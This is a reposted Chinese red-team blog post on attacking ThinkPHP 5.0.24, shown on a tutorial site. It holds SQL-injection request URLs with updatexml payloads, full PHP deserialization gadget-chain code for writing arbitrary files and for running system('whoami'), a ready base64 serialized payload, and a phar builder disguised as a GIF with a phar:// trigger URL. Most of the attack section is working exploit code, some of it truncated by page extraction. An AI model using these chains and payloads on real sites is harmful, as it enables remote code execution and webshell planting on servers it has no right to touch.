文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

thinkphp5 注入 反序列化写文件 phar反序列化

2023-09-10 17:26

关注

红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 (qq.com)

1.SQL注入1

where("id = {$id}")->select();     echo "
";     var_dump($result);     echo "
"; }}
http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

2.SQL注入2

get('username');    $result = db('users')->where('username','exp',$username)->select();     echo "
";     var_dump($result);     echo "
"; }}
http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23

 3.thinkphp5 反序列化写文件
这里就以 thinkphp5.0.24 这个版本 其他版本大同小异

files = [new Pivot($path,$data)];        }    }    $data = base64_encode('');    echo "tp5.0.24 write file pop Chain\n";    echo "The '=' cannot exist in the data,please check:".$data."\n";    $path = 'php://filter/convert.base64-decode/resource=./';    $aaa = new Windows($path,$data);    echo base64_encode(serialize($aaa));    echo "\n";    echo 'filename:'.md5('tag_'.md5(true)).'.php';}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($path,$data){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($path,$data);            $this->parent = new \think\console\Output($path,$data);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($path,$data){            $this->selfRelation = false;            $this->query = new Query($path,$data);            $this->bindAttr = ['a'.$data];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($path,$data){            $this->model = new Output($path,$data);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($path,$data){            $this->styles = ['getAttr'];            $this->handle = new Memcache($path,$data);        }    }}namespace think\session\driver{    use think\cache\driver\File;    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($path,$data){            $this->handler = new Memcached($path,$data);        }    }}namespace think\cache\driver{    class Memcached    {        protected $handler;        protected $tag;        protected $options = [];        public function __construct($path,$data){            $this->options = ['prefix'   => ''];            $this->handler = new File($path,$data);            $this->tag = true;        }    }}namespace think\cache\driver{    class File    {        protected $options = [];        protected $tag;        public function __construct($path,$data){            $this->tag = false;            $this->options = [                'expire'        => 0,                'cache_subdir'  => false,                'prefix'        => '',                'path'          => $path,                'data_compress' => false,            ];        }    }}

 在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
unserialize(加密函数(传入值)) 这种模式居多  这里就以这个为例子。

http://www.tp5024.com/index.php/index/index/test1?data=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

 4.thinkphp5 phar反序列化  
首先 php里要关闭这个只读模式

thinkphp5.0.24 还有其他链子

files = [new Pivot($function,$parameter)];        }    }    $aaa = new Windows('system','whoami');    echo base64_encode(serialize($aaa));}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    use think\console\Output;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($function,$parameter){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($function,$parameter);            $this->parent = new Output($function,$parameter);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($function,$parameter){            $this->selfRelation = false;            $this->query = new Query($function,$parameter);            $this->bindAttr = [''];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($function,$parameter){            $this->model = new Output($function,$parameter);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($function,$parameter){            $this->styles = ['getAttr'];            $this->handle = new Memcache($function,$parameter);        }    }}namespace think\session\driver{    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($function,$parameter){            $this->handler = new Memcached($function,$parameter);        }    }}namespace think\cache\driver{    use think\Request;    class Memcached{        protected $handler;        protected $options = [];        protected $tag;        public function __construct($function,$parameter){            // pop链中需要prefix存在,否则报错            $this->options = ['prefix'   => 'jelly/'];            $this->tag = true;            $this->handler = new Request($function,$parameter);        }    }}namespace think{    class Request    {        protected $get     = [];        protected $filter;        public function __construct($function,$parameter){            $this->filter = $function;            $this->get = ["jelly"=>$parameter];        }    }}

 这个是命令执行的 将它改成 phar 生成的包

files = [new Pivot($function,$parameter)];        }    }}namespace {    use think\process\pipes\Windows;    $data= new Windows('system', 'whoami');    unlink('exp2.phar');    $phar = new Phar('exp2.phar');    $phar -> stopBuffering();    $phar->setStub("GIF89a"."");//设置stub    $phar -> addFromString('test.txt','test');    $object = $data;    $phar -> setMetadata($object);    $phar -> stopBuffering();}namespace think{    abstract class Model    {}}namespace think\model{    use think\Model;    use think\console\Output;    class Pivot extends Model{        protected $append = [];        protected $error;        public $parent;        public function __construct($function,$parameter){            $this->append['jelly'] = 'getError';            $this->error = new relation\BelongsTo($function,$parameter);            $this->parent = new Output($function,$parameter);        }    }    abstract class Relation{}}namespace think\model\relation{    use think\db\Query;    use think\model\Relation;    abstract class OneToOne extends Relation{}    class BelongsTo extends OneToOne{        protected $selfRelation;        protected $query;        protected $bindAttr = [];        public function __construct($function,$parameter){            $this->selfRelation = false;            $this->query = new Query($function,$parameter);            $this->bindAttr = [''];        }    }}namespace think\db{    use think\console\Output;    class Query{        protected $model;        public function __construct($function,$parameter){            $this->model = new Output($function,$parameter);        }    }}namespace think\console{    use think\session\driver\Memcache;    class Output{        protected $styles = [];        private $handle;        public function __construct($function,$parameter){            $this->styles = ['getAttr'];            $this->handle = new Memcache($function,$parameter);        }    }}namespace think\session\driver{    use think\cache\driver\Memcached;    class Memcache{        protected $handler = null;        protected $config  = [            'expire'       => '',            'session_name' => '',        ];        public function __construct($function,$parameter){            $this->handler = new Memcached($function,$parameter);        }    }}namespace think\cache\driver{    use think\Request;    class Memcached{        protected $handler;        protected $options = [];        protected $tag;        public function __construct($function,$parameter){            // pop链中需要prefix存在,否则报错            $this->options = ['prefix'   => 'jelly/'];            $this->tag = true;            $this->handler = new Request($function,$parameter);        }    }}namespace think{    class Request    {        protected $get     = [];        protected $filter;        public function __construct($function,$parameter){            $this->filter = $function;            $this->get = ["jelly"=>$parameter];        }    }}

 

找个地方上传 审计文件操作函数 然后传入就可以了。

一般的方法是上传图片 再用phar访问就能触发了

http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt

 

来源地址:https://blog.csdn.net/weixin_57567655/article/details/127097871

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯